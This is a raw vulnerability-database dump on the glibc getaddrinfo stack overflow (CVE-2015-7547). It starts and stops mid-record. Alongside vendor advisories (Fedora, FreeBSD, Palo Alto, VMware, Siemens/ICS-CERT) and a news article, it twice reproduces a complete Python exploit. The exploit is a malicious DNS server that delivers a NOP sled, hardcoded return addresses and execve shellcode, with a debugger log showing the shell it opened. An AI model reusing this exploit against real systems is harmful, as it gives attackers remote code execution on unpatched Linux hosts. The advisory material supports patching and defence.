\u0003foo\u0003bar\u0006google\u0003com\u0001\u0001$\ufffd7\u0001\u0001\u0003foo\u0003bar\u0006google\u0003com\u001c\u0001\r\n[TCP] Request2 len recv 36\r\nsendto 2 \r\ndata1_reply\r\ndata2_reply\r\nprocess 6415 is executing new program: /bin/dash\r\n$ id\r\nuid=1000(haker) gid=1000(haker) groups=1000(haker),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare)\r\n$ \r\n\r\n'''\r\n\r\nimport socket\r\nimport time\r\nimport struct\r\nimport threading\r\n\r\nIP = '192.168.111.5' # Insert your ip for bind() here...\r\nANSWERS1 = 184\r\n\r\nterminate = False\r\nlast_reply = None\r\nreply_now = threading.Event()\r\n\r\n\r\ndef dw(x):\r\n return struct.pack('>H', x)\r\n\r\ndef dd(x):\r\n return struct.pack('>I', x)\r\n\r\ndef dl(x):\r\n return struct.pack('<Q', x)\r\n\r\ndef db(x):\r\n return chr(x)\r\n\r\ndef udp_thread():\r\n global terminate\r\n\r\n # Handle UDP requests\r\n sock_udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n sock_udp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n sock_udp.bind((IP, 53))\r\n\r\n reply_counter = 0\r\n counter = -1\r\n\r\n answers = []\r\n\r\n while not terminate:\r\n data, addr = sock_udp.recvfrom(1024)\r\n print '[UDP] Total Data len recv ' + str(len(data))\r\n id_udp = struct.unpack('>H', data[0:2])[0]\r\n query_udp = data[12:]\r\n\r\n # Send truncated flag... 
so it retries over TCP\r\n data = dw(id_udp) # id\r\n data += dw(0x8380) # flags with truncated set\r\n data += dw(1) # questions\r\n data += dw(0) # answers\r\n data += dw(0) # authoritative\r\n data += dw(0) # additional\r\n data += query_udp # question\r\n data += '\\x00' * 2500 # Need a long DNS response to force malloc \r\n\r\n answers.append((data, addr))\r\n\r\n if len(answers) != 2:\r\n continue\r\n\r\n counter += 1\r\n\r\n if counter % 4 == 2:\r\n answers = answers[::-1]\r\n\r\n\r\n print 'udp send '\r\n time.sleep(0.01)\r\n sock_udp.sendto(*answers.pop(0))\r\n\r\n print 'sendto 1 '\r\n reply_now.wait()\r\n sock_udp.sendto(*answers.pop(0))\r\n print 'sendto 2 '\r\n\r\n sock_udp.close()\r\n\r\n\r\ndef tcp_thread():\r\n global terminate\r\n counter = -1\r\n\r\n #Open TCP socket\r\n sock_tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sock_tcp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n sock_tcp.bind((IP, 53))\r\n sock_tcp.listen(10)\r\n\r\n print 'a'\r\n\t\r\n while not terminate:\r\n conn, addr = sock_tcp.accept()\r\n counter += 1\r\n print 'TCP Connected with ' + addr[0] + ':' + str(addr[1])\r\n\r\n # Read entire packet\r\n data = conn.recv(1024)\r\n print '[TCP] Total Data len recv ' + str(len(data))\r\n\r\n reqlen1 = socket.ntohs(struct.unpack('H', data[0:2])[0])\r\n print '[TCP] Request1 len recv ' + str(reqlen1)\r\n data1 = data[2:2+reqlen1]\r\n\r\n print 'data1 = ' +data1\r\n\r\n id1 = struct.unpack('>H', data1[0:2])[0]\r\n query1 = data[12:]\r\n\r\n print 'query = ' + query1\r\n\r\n # Do we have an extra request?\r\n data2 = None\r\n if len(data) > 2+reqlen1:\r\n reqlen2 = socket.ntohs(struct.unpack('H', data[2+reqlen1:2+reqlen1+2])[0])\r\n print '[TCP] Request2 len recv ' + str(reqlen2)\r\n data2 = data[2+reqlen1+2:2+reqlen1+2+reqlen2]\r\n id2 = struct.unpack('>H', data2[0:2])[0]\r\n query2 = data2[12:]\r\n\r\n\r\n\r\n # Reply them on different packets\r\n data = ''\r\n data += dw(id1) # id\r\n data += dw(0x8180) # 
flags\r\n data += dw(1) # questions\r\n data += dw(ANSWERS1) # answers\r\n data += dw(0) # authoritative\r\n data += dw(0) # additional\r\n data += query1 # question\r\n\r\n\r\n\r\n for i in range(ANSWERS1):\r\n answer = dw(0xc00c) # name compressed\r\n answer += dw(1) # type A\r\n answer += dw(1) # class\r\n answer += dd(13) # ttl\r\n answer += dw(4) # data length\r\n answer += 'D' * 4 # data\r\n\r\n data += answer\r\n\r\n data1_reply = dw(len(data)) + data\r\n\r\n if data2:\r\n data = ''\r\n data += dw(id2)\r\n data += 'A' * (6)\r\n data += '\\x08\\xc5\\xff\\xff\\xff\\x7f\\x00\\x00'\r\n data += '\\x90' * (44)\r\n data += '\\x90' * (1955)\r\n data += '\\x48\\x31\\xff\\x57\\x57\\x5e\\x5a\\x48\\xbf\\x2f\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x48\\xc1\\xef\\x08\\x57\\x54\\x5f\\x6a\\x3b\\x58\\x0f\\x05'\r\n data += '\\x90' * (100)\r\n data += '\\xc0\\xc4\\xff\\xff\\xff\\x7f\\x00\\x00'\r\n data += 'F' * (8)\r\n data += '\\xc0\\xc4\\xff\\xff\\xff\\x7f\\x00\\x00'\r\n data += 'G' * (134)\r\n data2_reply = dw(len(data)) + data\r\n else:\r\n data2_reply = None\r\n\r\n reply_now.set()\r\n time.sleep(0.01)\r\n conn.sendall(data1_reply)\r\n print 'data1_reply'\r\n time.sleep(0.01)\r\n if data2:\r\n conn.sendall(data2_reply)\r\n print 'data2_reply'\r\n\r\n reply_now.clear()\r\n\r\n sock_tcp.shutdown(socket.SHUT_RDWR)\r\n sock_tcp.close()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n t = threading.Thread(target=udp_thread)\r\n t.daemon = True\r\n t.start()\r\n tcp_thread()\r\n terminate = True\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/40339/"}, {"lastseen": "2016-02-21T18:24:34", "description": "glibc - getaddrinfo Stack-Based Buffer Overflow. CVE-2015-7547. 
Dos exploit for linux platform", "published": "2016-02-16T00:00:00", "type": "exploitdb", "title": "glibc - getaddrinfo Stack-Based Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7547"], "modified": "2016-02-16T00:00:00", "id": "EDB-ID:39454", "href": "https://www.exploit-db.com/exploits/39454/", "sourceData": "Sources: \r\nhttps://googleonlinesecurity.blogspot.sg/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html\r\nhttps://github.com/fjserna/CVE-2015-7547\r\n\r\nTechnical information:\r\n\r\nglibc reserves 2048 bytes in the stack through alloca() for the DNS answer at _nss_dns_gethostbyname4_r() for hosting responses to a DNS query.\r\n\r\nLater on, at send_dg() and send_vc(), if the response is larger than 2048 bytes, a new buffer is allocated from the heap and all the information (buffer pointer, new buffer size and response size) is updated.\r\n\r\nUnder certain conditions a mismatch between the stack buffer and the new heap allocation will happen. The final effect is that the stack buffer will be used to store the DNS response, even though the response is larger than the stack buffer and a heap buffer was allocated. This behavior leads to the stack buffer overflow.\r\n\r\nThe vectors to trigger this buffer overflow are very common and can include ssh, sudo, and curl. We are confident that the exploitation vectors are diverse and widespread; we have not attempted to enumerate these vectors further.\r\n\r\nWe are providing this code as-is. You are responsible for protecting yourself,\r\nyour property and data, and others from any risks caused by this code. This\r\ncode may cause unexpected and undesirable behavior to occur on your machine.\r\nThis code may not detect the vulnerability on your system.\r\n\r\nNote that this POC consists of two components: server code and client code.\r\nThe server code triggers the vulnerability and therefore will crash the client\r\ncode. 
Note also that it is necessary to set the nameserver to point to the\r\nserver code, and doing so could cause other programs that call into the\r\ngetaddrinfo() function to crash while testing is underway. This POC code is\r\nprovided \"as is\" with no warranties, whether express or implied, including\r\nwithout limitation any warranties or merchantability, fitness for a particular\r\nuse and noninfringement. Google assumes no responsibility for your proper\r\ninstallation and use of the POC code.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/fjserna/CVE-2015-7547/archive/master.zip\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39454-1.zip\r\n\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/39454/"}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2015-7547"], "description": "The glibc package contains standard libraries which are used by multiple programs on the system. In order to save disk space and memory, as well as to make upgrading easier, common system code is kept in one place and shared between programs. This particular package contains the most important sets of shared libraries: the standard C library and the standard math library. Without these two libraries, a Linux system will not function. ", "modified": "2016-02-17T14:21:52", "published": "2016-02-17T14:21:52", "id": "FEDORA:D5374605E7C9", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: glibc-2.22-9.fc23", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1781", "CVE-2015-7547", "CVE-2015-8777"], "description": "The glibc package contains standard libraries which are used by multiple programs on the system. 
In order to save disk space and memory, as well as to make upgrading easier, common system code is kept in one place and shared between programs. This particular package contains the most important sets of shared libraries: the standard C library and the standard math library. Without these two libraries, a Linux system will not function. ", "modified": "2016-02-17T12:51:37", "published": "2016-02-17T12:51:37", "id": "FEDORA:E4AC9605712D", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: glibc-2.21-11.fc22", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:25:22", "description": "", "published": "2016-09-06T00:00:00", "type": "packetstorm", "title": "glibc getaddrinfo Stack Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7547"], "modified": "2016-09-06T00:00:00", "id": "PACKETSTORM:138601", "href": "https://packetstormsecurity.com/files/138601/glibc-getaddrinfo-Stack-Buffer-Overflow.html", "sourceData": "`add by SpeeDr00t@Blackfalcon (jang kyoung chip) \n \nThis is a published vulnerability by google in the past. \nPlease refer to the link below. \n \nReference: \n- https://googleonlinesecurity.blogspot.kr/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html \n- https://github.com/fjserna/CVE-2015-7547 \n- CVE-2015-7547: glibc getaddrinfo stack-based buffer overflow \n \nWhen Google announced about this code(vulnerability), \nit was missing information on shellcode. \nSo, I tried to completed the shellcode. \nIn the future, I hope to help your study. \n \n \n(gdb) gdb -q client1 \nUndefined command: \"gdb\". Try \"help\". \n(gdb) r \nStarting program: /home/haker/client1 \nGot object file from memory but can't read symbols: File truncated. 
\n[UDP] Total Data len recv 36 \n[UDP] Total Data len recv 36 \nudp send \nsendto 1 \nTCP Connected with 127.0.0.1:60259 \n[TCP] Total Data len recv 76 \n[TCP] Request1 len recv 36 \ndata1 = i?1/2i?1/2foobargooglecom \nquery = foobargooglecom$(i?1/2foobargooglecom \n[TCP] Request2 len recv 36 \nsendto 2 \ndata1_reply \ndata2_reply \n[UDP] Total Data len recv 36 \n[UDP] Total Data len recv 36 \nudp send \nsendto 1 \nTCP Connected with 127.0.0.1:60260 \n[TCP] Total Data len recv 76 \n[TCP] Request1 len recv 36 \ndata1 = i?1/2i?1/2foobargooglecom \nquery = foobargooglecom$i?1/27foobargooglecom \n[TCP] Request2 len recv 36 \nsendto 2 \ndata1_reply \ndata2_reply \nprocess 6415 is executing new program: /bin/dash \n$ id \nuid=1000(haker) gid=1000(haker) groups=1000(haker),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare) \n$ \n \n''' \n \nimport socket \nimport time \nimport struct \nimport threading \n \nIP = '192.168.111.5' # Insert your ip for bind() here... \nANSWERS1 = 184 \n \nterminate = False \nlast_reply = None \nreply_now = threading.Event() \n \n \ndef dw(x): \nreturn struct.pack('>H', x) \n \ndef dd(x): \nreturn struct.pack('>I', x) \n \ndef dl(x): \nreturn struct.pack('<Q', x) \n \ndef db(x): \nreturn chr(x) \n \ndef udp_thread(): \nglobal terminate \n \n# Handle UDP requests \nsock_udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) \nsock_udp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) \nsock_udp.bind((IP, 53)) \n \nreply_counter = 0 \ncounter = -1 \n \nanswers = [] \n \nwhile not terminate: \ndata, addr = sock_udp.recvfrom(1024) \nprint '[UDP] Total Data len recv ' + str(len(data)) \nid_udp = struct.unpack('>H', data[0:2])[0] \nquery_udp = data[12:] \n \n# Send truncated flag... 
so it retries over TCP \ndata = dw(id_udp) # id \ndata += dw(0x8380) # flags with truncated set \ndata += dw(1) # questions \ndata += dw(0) # answers \ndata += dw(0) # authoritative \ndata += dw(0) # additional \ndata += query_udp # question \ndata += '\\x00' * 2500 # Need a long DNS response to force malloc \n \nanswers.append((data, addr)) \n \nif len(answers) != 2: \ncontinue \n \ncounter += 1 \n \nif counter % 4 == 2: \nanswers = answers[::-1] \n \n \nprint 'udp send ' \ntime.sleep(0.01) \nsock_udp.sendto(*answers.pop(0)) \n \nprint 'sendto 1 ' \nreply_now.wait() \nsock_udp.sendto(*answers.pop(0)) \nprint 'sendto 2 ' \n \nsock_udp.close() \n \n \ndef tcp_thread(): \nglobal terminate \ncounter = -1 \n \n#Open TCP socket \nsock_tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nsock_tcp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) \nsock_tcp.bind((IP, 53)) \nsock_tcp.listen(10) \n \nprint 'a' \n \nwhile not terminate: \nconn, addr = sock_tcp.accept() \ncounter += 1 \nprint 'TCP Connected with ' + addr[0] + ':' + str(addr[1]) \n \n# Read entire packet \ndata = conn.recv(1024) \nprint '[TCP] Total Data len recv ' + str(len(data)) \n \nreqlen1 = socket.ntohs(struct.unpack('H', data[0:2])[0]) \nprint '[TCP] Request1 len recv ' + str(reqlen1) \ndata1 = data[2:2+reqlen1] \n \nprint 'data1 = ' +data1 \n \nid1 = struct.unpack('>H', data1[0:2])[0] \nquery1 = data[12:] \n \nprint 'query = ' + query1 \n \n# Do we have an extra request? 
\ndata2 = None \nif len(data) > 2+reqlen1: \nreqlen2 = socket.ntohs(struct.unpack('H', data[2+reqlen1:2+reqlen1+2])[0]) \nprint '[TCP] Request2 len recv ' + str(reqlen2) \ndata2 = data[2+reqlen1+2:2+reqlen1+2+reqlen2] \nid2 = struct.unpack('>H', data2[0:2])[0] \nquery2 = data2[12:] \n \n \n \n# Reply them on different packets \ndata = '' \ndata += dw(id1) # id \ndata += dw(0x8180) # flags \ndata += dw(1) # questions \ndata += dw(ANSWERS1) # answers \ndata += dw(0) # authoritative \ndata += dw(0) # additional \ndata += query1 # question \n \n \n \nfor i in range(ANSWERS1): \nanswer = dw(0xc00c) # name compressed \nanswer += dw(1) # type A \nanswer += dw(1) # class \nanswer += dd(13) # ttl \nanswer += dw(4) # data length \nanswer += 'D' * 4 # data \n \ndata += answer \n \ndata1_reply = dw(len(data)) + data \n \nif data2: \ndata = '' \ndata += dw(id2) \ndata += 'A' * (6) \ndata += '\\x08\\xc5\\xff\\xff\\xff\\x7f\\x00\\x00' \ndata += '\\x90' * (44) \ndata += '\\x90' * (1955) \ndata += '\\x48\\x31\\xff\\x57\\x57\\x5e\\x5a\\x48\\xbf\\x2f\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x48\\xc1\\xef\\x08\\x57\\x54\\x5f\\x6a\\x3b\\x58\\x0f\\x05' \ndata += '\\x90' * (100) \ndata += '\\xc0\\xc4\\xff\\xff\\xff\\x7f\\x00\\x00' \ndata += 'F' * (8) \ndata += '\\xc0\\xc4\\xff\\xff\\xff\\x7f\\x00\\x00' \ndata += 'G' * (134) \ndata2_reply = dw(len(data)) + data \nelse: \ndata2_reply = None \n \nreply_now.set() \ntime.sleep(0.01) \nconn.sendall(data1_reply) \nprint 'data1_reply' \ntime.sleep(0.01) \nif data2: \nconn.sendall(data2_reply) \nprint 'data2_reply' \n \nreply_now.clear() \n \nsock_tcp.shutdown(socket.SHUT_RDWR) \nsock_tcp.close() \n \n \nif __name__ == \"__main__\": \n \nt = threading.Thread(target=udp_thread) \nt.daemon = True \nt.start() \ntcp_thread() \nterminate = True \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/138601/glibcgetaddrinfo-overflow.txt"}], 
"freebsd": [{"lastseen": "2019-05-29T18:32:49", "bulletinFamily": "unix", "cvelist": ["CVE-2015-7547"], "description": "\nFabio Olive Leite reports:\n\nA stack-based buffer overflow was found in libresolv when invoked\n\t from nss_dns, allowing specially crafted DNS responses to seize\n\t control of EIP in the DNS client. The buffer overflow occurs in the\n\t functions send_dg (send datagram) and send_vc (send TCP) for the\n\t NSS module libnss_dns.so.2 when calling getaddrinfo with AF_UNSPEC\n\t family, or in some cases AF_INET6 family. The use of AF_UNSPEC (or\n\t AF_INET6 in some cases) triggers the low-level resolver code to\n\t send out two parallel queries for A and AAAA. A mismanagement of\n\t the buffers used for those queries could result in the response of\n\t a query writing beyond the alloca allocated buffer created by\n\t __res_nquery.\n\n", "edition": 4, "modified": "2016-02-16T00:00:00", "published": "2016-02-16T00:00:00", "id": "2DD7E97E-D5E8-11E5-BCBD-BC5FF45D0F28", "href": "https://vuxml.freebsd.org/freebsd/2dd7e97e-d5e8-11e5-bcbd-bc5ff45d0f28.html", "title": "glibc -- getaddrinfo stack-based buffer overflow", "type": "freebsd", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "paloalto": [{"lastseen": "2020-12-24T13:20:57", "bulletinFamily": "software", "cvelist": ["CVE-2015-7547"], "description": "A vulnerability in the GNU libc (glibc) DNS resolver allows remote code execution (CVE-2015-7547). However, this issue can be exploited only from a DNS server that is under the control of an attacker. (Ref # 91886).\nThis glibc issue is only exploitable by an attacker controlling the DNS server configured for the device. 
Furthermore, the attacker must overcome additional anti-exploitation mitigations, such as ASLR, to mount a successful attack.\nThis issue affects PAN-OS 5.0.19 and earlier; PAN-OS 5.1.12 and earlier; PAN-OS 6.0.14 and earlier; PAN-OS 6.1.12 and earlier; PAN-OS 7.0.7 and earlier; PAN-OS 7.1.3 and earlier\n\n**Work around:**\nThis vulnerability can affect PAN-OS software only when the device is configured with a DNS server that is under the control of an attacker. Palo Alto Networks discourages configuring the device with untrusted DNS servers.", "edition": 6, "modified": "2016-08-15T19:00:00", "published": "2016-08-15T19:00:00", "id": "PAN-SA-2016-0021", "href": "https://securityadvisories.paloaltonetworks.com/CVE-2015-7547", "title": "Glibc DNS Resolver Vulnerability", "type": "paloalto", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "vmware": [{"lastseen": "2019-11-06T16:05:31", "bulletinFamily": "unix", "cvelist": ["CVE-2015-7547"], "description": "**a. glibc update for multiple products.**\n\nThe glibc library has been updated in multiple products to resolve a stack buffer overflow present in the glibc getaddrinfo function. \n \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the identifier CVE-2015-7547. \n\n\nVMware products have been grouped into the following four categories: \n \n**I) ESXi and ESX Hypervisor** \n \nVersions of ESXi and ESX prior to 5.5 are not affected because they do not ship with a vulnerable version of glibc. ESXi 5.5 and ESXi 6.0 ship with a vulnerable version of glibc and are affected. \nSee table 1 for remediation for ESXi 5.5 and ESXi 6.0. \n \n**II) Windows-based products** \n \nWindows-based products, including all versions of vCenter Server running on Windows, are not affected.\n\n \n**III) VMware virtual appliances** \n \nVMware virtual appliances ship with a vulnerable version of glibc and are affected. \nSee table 2 for remediation for appliances. 
\n \n**IV) Products that run on Linux** \n \nVMware products that run on Linux (excluding virtual appliances) might use a vulnerable version of glibc as part of the base operating system. If the operating system has a vulnerable version of glibc, VMware recommends that customers contact their operating system vendor for resolution. \n \n**WORKAROUND** \n \nWorkarounds are available for several virtual appliances. These are documented in [VMware KB article 2144032](<http://kb.vmware.com/kb/2144032>). \n \n**RECOMMENDATIONS** \n\n\nVMware recommends customers evaluate and deploy patches for affected products in Table 1 and 2 below as these patches become available. In case patches are not available, customers are advised to deploy the workaround. \n \n \nColumn 4 of the following tables lists the action required to remediate the vulnerability in each release, if a solution is available. \n \nTable 1 - ESXi \n\n", "edition": 4, "modified": "2016-02-23T00:00:00", "published": "2016-02-22T00:00:00", "id": "VMSA-2016-0002", "href": "https://www.vmware.com/security/advisories/VMSA-2016-0002.html", "title": "VMware product updates address a critical glibc security vulnerability", "type": "vmware", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "ics": [{"lastseen": "2021-02-27T19:53:44", "bulletinFamily": "info", "cvelist": ["CVE-2015-7547"], "description": "## OVERVIEW\n\nThis updated advisory is a follow-up to the advisory update titled ICSA-16-103-01B Siemens Industrial Products glibc Library Vulnerability that was published July 14, 2016, on the NCCIC/ICS-CERT web site.\n\nSiemens reports that a buffer overflow vulnerability in the glibc library could affect several of its industrial products.\n\n### **\\--------- Begin Update C Part 1 of 3 --------**\n\nSiemens has produced updates to mitigate this vulnerability in ROX II, APE devices, SINEMA Remote Connect, Basic RT V13, and SCALANCE M-800/S615.\n\n### **\\--------- End Update C Part 1 of 3 
----------**\n\nThis vulnerability could be exploited remotely. Exploits that target this vulnerability are known to be publicly available.\n\n## AFFECTED PRODUCTS\n\nSiemens reports that the vulnerability affects the following products:\n\n * ROX II: V2.3.0-V2.9.0 (inclusive),\n * APE (Linux): All versions,\n * SINEMA Remote Connect: All versions prior to Version 1.2,\n\n### **\\--------- Begin Update C Part 2 of 3 --------**\n\n * SCALANCE M-800/S615: All versions prior to version 4.02, and\n\n### **\\--------- End Update C Part 2 of 3 ----------**\n\n * Basic RT V13: All versions prior to V13 SP1 Update 9\n\n## IMPACT\n\nAn attacker who successfully exploits this vulnerability may be able to cause a denial-of-service condition in the affected devices or possibly execute arbitrary code.\n\nImpact to individual organizations depends on many factors that are unique to each organization. ICS-CERT recommends that organizations evaluate the impact of this vulnerability based on their operational environment, architecture, and product implementation.\n\n## BACKGROUND\n\nSiemens is a multinational company headquartered in Munich, Germany.\n\nSiemens ROX-based devices are used to connect devices that operate in harsh environments such as electric utility substations and traffic control cabinets. RUGGEDCOM APE is a utility-grade computing platform that plugs directly into any member of the RUGGEDCOM RX1500 family and makes it possible to run third-party software applications without an external industrial PC. SINEMA Remote Connect is a management platform for remote networks allowing users to manage and maintain tunnel connections (VPN) between networks, machines, and sites. 
SCALANCE security modules provide filtering of incoming and outgoing network connections with stateful packet inspection.\n\nAccording to Siemens, the affected devices are deployed across several sectors including Chemical, Communications, Critical Manufacturing, Dams, Energy, Food and Agriculture, Government Facilities, Healthcare and Public Health, Transportation Systems, and Water and Wastewater Systems. Siemens estimates that these products are used worldwide.\n\n## VULNERABILITY CHARACTERIZATION\n\n### VULNERABILITY OVERVIEW\n\n### IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFERa\n\nThere is a stack-based buffer overflow vulnerability in the glibc library\u2019s DNS client side resolver.\n\nCVE-2015-7547b has been assigned to this vulnerability. A CVSS v3 base score of 8.1 has been calculated; the CVSS vector string is (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).c\n\n### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nThis vulnerability could be exploited remotely.\n\n#### EXISTENCE OF EXPLOIT\n\nExploits that target this vulnerability are publicly available.\n\n#### DIFFICULTY\n\nCrafting a working exploit for this vulnerability would be difficult.\n\n## MITIGATION\n\nSiemens provides updates for the following products and encourages customers to update their products:\n\n * ROX II: Update to version 2.9.1\n * Submit a support request online\n\n<https://www.siemens.com/automation/support-request>\n\n * Call a local hotline center:\n\n<https://w3.siemens.com/aspa_app/>\n\n * APE (Linux): Follow update process provided in the corresponding application note:\n\n<http://support.automation.siemens.com/WW/view/en/109485761>\n\n * Basic RT V13: Update to Version V13 SP 1 Update 9:\n\n<https://support.industry.siemens.com/cs/ww/en/view/109311724>\n\n * SINEMA Remote Connect software update for Version 1.2 is available at the following link:\n\n<https://support.industry.siemens.com/cs/ww/en/view/109737963>\n\n### **\\--------- Begin Update C 
Part 3 of 3 --------**\n\n * SCALANCE M-800/S615: Update to V4.02:\n\n<https://support.industry.siemens.com/cs/ww/en/view/109740858>\n\nSiemens recommends applying the following mitigations until patches can be applied:\n\n### **\\--------- End Update C Part 3 of 3 --------**\n\n * Disable use of DNS on affected devices if possible.\n * Use trusted DNS servers, trusted networks/providers, and known trusted DNS domains in device configuration.\n\nOR\n\n * Limit size of DNS responses to 512 bytes for UDP messages, and 1024 bytes for TCP messages on network border.\n\nAs a general security measure, Siemens strongly recommends to protect network access to nonperimeter devices with appropriate mechanisms. It is advised to configure the environment according to Siemens operational guidelines in order to run the devices in a protected IT environment.\n\nFor more information on this vulnerability and more detailed mitigation instructions, please see Siemens Security Advisory SSA-301706 at the following location:\n\n<http://www.siemens.com/cert/advisories>\n\nICS-CERT recommends that users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. 
Also recognize that VPN is only as secure as the connected devices.\n\nICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page at: http://ics-cert.us-cert.gov/content/recommended-practices. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT web site (http://ics-cert.us-cert.gov/).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\n * aCWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer, http://cwe.mitre.org/data/definitions/119.html, web site last accessed April 12, 2016.\n * bNVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7547, web site last accessed April 12, 2016.\n * cCVSS Calculator, https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H, web site last accessed April 12, 2016.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. 
You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/ICSA-16-103-01>); we'd welcome your feedback.\n", "modified": "2018-08-23T00:00:00", "published": "2016-04-12T00:00:00", "id": "ICSA-16-103-01", "href": "https://www.us-cert.gov/ics/advisories/ICSA-16-103-01", "type": "ics", "title": "Siemens Industrial Products glibc Library Vulnerability (Update C)", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2018-01-27T10:06:54", "bulletinFamily": "info", "cvelist": ["CVE-2015-0235", "CVE-2015-7547"], "description": "[](<https://3.bp.blogspot.com/-_4EpHCqniVA/VsQtYB5WSwI/AAAAAAAAmuc/xFGkZE8C85Q/s1600/glibc-linux-flaw.png>)\n\nA highly critical vulnerability has been uncovered in the **GNU C Library (glibc)**, a key component of most Linux distributions, that leaves nearly all Linux machines, thousands of apps and electronic devices vulnerable to hackers that can take full control over them.\n\n \n\n\nJust clicking on a link or connecting to a server can result in remote code execution (RCE), allowing hackers to steal credentials, spy on users, seize control of computers, and many more.\n\n \n\n\nThe vulnerability is similar to the last year's [GHOST vulnerability](<https://thehackernews.com/2015/01/ghost-linux-security-vulnerability27.html>) (CVE-2015-0235) that left countless machines vulnerable to_ remote code execution (RCE) attacks_, representing a major Internet threat.\n\n \n\n\nGNU C Library (glibc) is a collection of open source code that powers thousands of standalone apps and most Linux distributions, including those distributed to routers and other types of hardware.\n\n 
\n\n\nThe recent flaw, which is indexed as _CVE-2015-7547_, is a **stack-based buffer overflow** vulnerability in glibc's DNS client-side resolver that is used to translate human-readable domain names, like google.com, into a network IP address.\n\n \n\n\nThe buffer overflow flaw is triggered when the _getaddrinfo() library function_ that performs domain-name lookups is in use, allowing hackers to remotely execute malicious code.\n\n \n\n\n### How Does the Flaw Work?\n\n \n\n\nThe flaw can be exploited when an affected device or app make queries to a malicious DNS server that returns too much information to a lookup request and floods the program's memory with code.\n\n \n\n\nThis code then compromises the vulnerable application or device and tries to take over the control over the whole system.\n\n \n\n\nIt is possible to inject the domain name into server log files, which when resolved will trigger remote code execution. An SSH (Secure Shell) client connecting to a server could also be compromised.\n\n \n\n\nHowever, an attacker need to bypass several operating system security mechanisms \u2013 _like ASLR and non-executable stack protection _\u2013 in order to achieve successful RCE attack.\n\n \n\n\nAlternatively, an attacker on your network could perform **man-in-the-middle **(MitM) attacks and tamper with DNS replies in a view to monitoring and manipulating (injecting 